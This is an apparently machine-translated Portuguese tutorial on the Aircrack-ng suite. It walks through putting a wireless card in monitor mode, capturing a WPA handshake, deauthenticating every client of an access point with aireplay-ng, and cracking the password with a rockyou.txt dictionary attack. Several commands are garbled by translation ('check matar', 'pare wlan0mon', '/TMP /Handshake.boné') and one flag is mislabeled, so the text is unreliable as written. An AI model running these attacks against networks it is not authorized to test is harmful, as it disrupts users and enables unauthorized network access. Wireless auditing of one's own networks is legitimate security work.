Airmon-Ng
Airmon-ng é usado para gerenciar modos de cartão sem fio e para matar processos desnecessários enquanto usam aircrack-ng. Para farejar uma conexão sem fio, você precisa alterar seu cartão sem fio do modo gerenciado para monitorar o modo e o airmon-ng é usado para esse fim.
Airodump-ng
Airodump-NG é um sniffer sem fio que pode capturar dados sem fio de um ou mais pontos de acesso sem fio. É usado para analisar pontos de acesso próximos e capturar apertos de mão.
Aireplay-ng
Aireplay-NG é usado para ataques de repetição e como injetor de pacotes. Pode ser desbra-autenticar usuários de seus APs para capturar apertos de mão.
AirDecap-NG
AirDecap-NG é usado para descriptografar WEP criptografado, pacotes sem fio WPA/WPA2 com chave conhecida.
Aircrack-ng
Aircrack-ng é usado para atacar protocolos WPA/WEP sem fio para encontrar a chave.
Aircrack-ng é fácil de instalar no Ubuntu usando o apt. Basta digitar o comando a seguir e isso instalará todas as ferramentas disponíveis no Aircrack-NG Suite.
Atualização de sudo apt-get
sudo apt-get install -y aircrack-ng
Uso
Neste artigo, vamos dar uma rápida olhada em como usar o Aircrack-ng para quebrar uma rede sem fio criptografada (TR1CKST3R neste exemplo) para encontrar a senha.
Primeiro de tudo, liste todas as placas sem fio disponíveis conectadas ao seu PC usando o comando 'iwconfig'.
Usaremos 'WLXC83A35CB4546' CARTO sem fio para este tutorial (isso pode ser diferente no seu caso). Agora, mate todos os processos em execução no cartão sem fio usando airmon-ng.
ubuntu@ubuntu: ~ $ sudo airmon-ng check matar
Iniciar o modo de monitor em 'wlxc83a35cb4546' digitando
ubuntu@ubuntu: ~ $ sudo airmon-ng start wlxc83a35cb4546
Agora, o airmon-ng iniciou o modo de monitor no cartão sem fio, ele aparecerá como um nome diferente 'wlan0mon'. Run 'iwconfig' novamente para listar detalhes sem fio.
Em seguida, use airodump-ng para ver pontos de acesso sem fio próximos e suas propriedades.
ubuntu@ubuntu: ~ $ sudo airodump-ng wlan0mon
Você pode restringir a pesquisa usando os filtros Mac (-bsSid) e canal (-C). Para capturar o handshake (o handshake contém senha criptografada), precisamos salvar nossos pacotes em algum lugar usando a opção "-write". Tipo,
ubuntu@ubuntu: ~ $ sudo airodump-ng--bssid 6c: b7: 49: fc: 62: e4
-C 11 WLAN0MON -WRITE /TMP /Handshake.boné
--BSSID: endereço MAC do ponto de acesso
-C: canal do ponto de acesso [1-13]
--Escreva: lojas capturadas pacotes em um local definido
Agora, precisamos desarticar todos os dispositivos deste ponto de acesso usando o utilitário Aireplay-NG. Escrever
ubuntu@ubuntu: ~ sudo aireplay -ng -0 100 -a [mac_add] wlan0mon
-R: Especifique pontos de acesso mac para aireplay-ng
-0: Especifique o número de pacotes DEAUTH para enviar
Depois de um tempo, todos os dispositivos serão desconectados desse ponto de acesso, quando tentarem se reconectar, a execução do Airodump-NG captura o aperto de mão. Vai aparecer no topo de correr airodump-ng.
O handshake é armazenado no diretório '/tmp/' e contém senha criptografada que pode ser forçada offline bruta usando um dicionário. Para quebrar a senha, usaremos o Aircrack-NG. Tipo
ubuntu@ubuntu: ~ $ sudo aircrack-ng /tmp /handshake.Cap-01.Cap -w
/usr/share/wordlists/rockyou.TXT
-W: Especifique o local do dicionário
Aircrack-ng passará pela lista de senhas e, se encontrado, exibirá a senha usada como chave.
Nesse caso, o Aircrack-NG encontrou a senha usada '123456789'.
Agora, pare o modo de monitor em cartão sem fio e reinicie o gerente de rede.
ubuntu@ubuntu: ~ $ sudo airmon-ng pare wlan0mon
ubuntu@ubuntu: ~ $ sudo serviços de serviço de rede-manager
Conclusão
Aircrack-ng pode ser usado para auditar a segurança sem fio ou para quebrar senhas esquecidas. Existem outras ferramentas semelhantes disponíveis para esse fim, como o Kismet, mas o Aircrack-NG é mais conhecido por um bom suporte, versatilidade e ampla gama de ferramentas. É fácil usar a interface da linha de comando que pode ser facilmente automatizada usando qualquer linguagem de script como python.